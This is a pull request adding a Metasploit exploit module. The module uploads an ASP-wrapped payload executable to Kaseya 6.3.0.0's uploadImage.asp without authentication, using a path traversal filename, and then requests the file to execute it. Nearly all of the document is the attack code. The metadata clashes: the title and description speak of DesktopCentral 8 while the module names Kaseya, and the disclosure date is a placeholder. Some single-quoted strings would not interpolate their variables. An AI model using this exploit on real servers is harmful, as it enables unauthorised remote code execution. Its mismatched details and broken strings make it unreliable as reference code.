### PR TITLE
Desktopcentral arbitrary file upload

### DIFF
--- a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb
+++ b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb
@@ -1,0 +1,93 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::EXE
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Kaseya uploadImage Arbitrary File Upload',
+			'Description'    => %q{
+					This module exploits an arbitrary file upload vulnerability found in Kaseya 6.3.0.0
+				A malicious user can upload a file to an arbitrary directory without authentication, which can result in arbitrary code execution.
+Code executed in this manner runs under the IUSR account.
+			},
+			'Author'         =>
+				[
+					'Thomas Hibbert' # thomas.hibbert@security-assessment.com
+				],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+				],
+			'Payload'	     =>
+				{
+					'BadChars' => "\x00",
+				},
+			'Platform'       => 'win',
+			'Arch'		     => ARCH_x86,
+			'Targets'        =>
+				[
+                                 [ 'Kaseya KServer / Windows', {} ],
+				],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'some point....'))
+
+		register_options(
+			[                     
+                         Opt::RPORT(80), Opt::RHOST()
+			], self.class)
+	end
+
+	def check
+		res = send_request_cgi({
+			'method' => 'POST',
+			'uri'    => normalize_uri('SystemTab','uploadImage.asp')
+		})
+
+		if not res or res.code != 200
+			return Exploit::CheckCode::Unknown
+		end
+
+		return Exploit::CheckCode::Appears
+	end
+
+	def exploit
+          peer = "#{rhost}:#{rport}"
+          
+          @payload_name = "#{rand_text_alpha_lower(8)}.asp"
+          exe  = generate_payload_exe
+          asp  = Msf::Util::EXE.to_exe_asp(exe)          
+
+		data = Rex::MIME::Message.new
+          data.add_part(asp, "application/octet-stream", nil, "form-data; name=\"#{payload_name}\"")
+
+		res = send_request_raw({
+			'method' => 'POST',
+                                         'uri'    => normalize_uri('SystemTab','uploadImage.asp?filename=..\..\..\#{payload_name}'),
+                                         'data'   => data,
+			'headers'	=> {
+                                           'ctype' => 'multipart/form-data; boundary=#{data.bound}'
+			}
+		})
+		if not res or res.code != 200
+			fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
+		end
+
+		print_status("#{peer} - Executing payload #{@payload_name}")
+		res = send_request_raw({
+			'uri'    => normalize_uri(@payload_name),
+			'method' => 'GET'
+		})
+	end
+end


### PR DESCRIPTION
This module exploits an arbitrary file upload bug in DesktopCentral 8 prior to patch 80293.
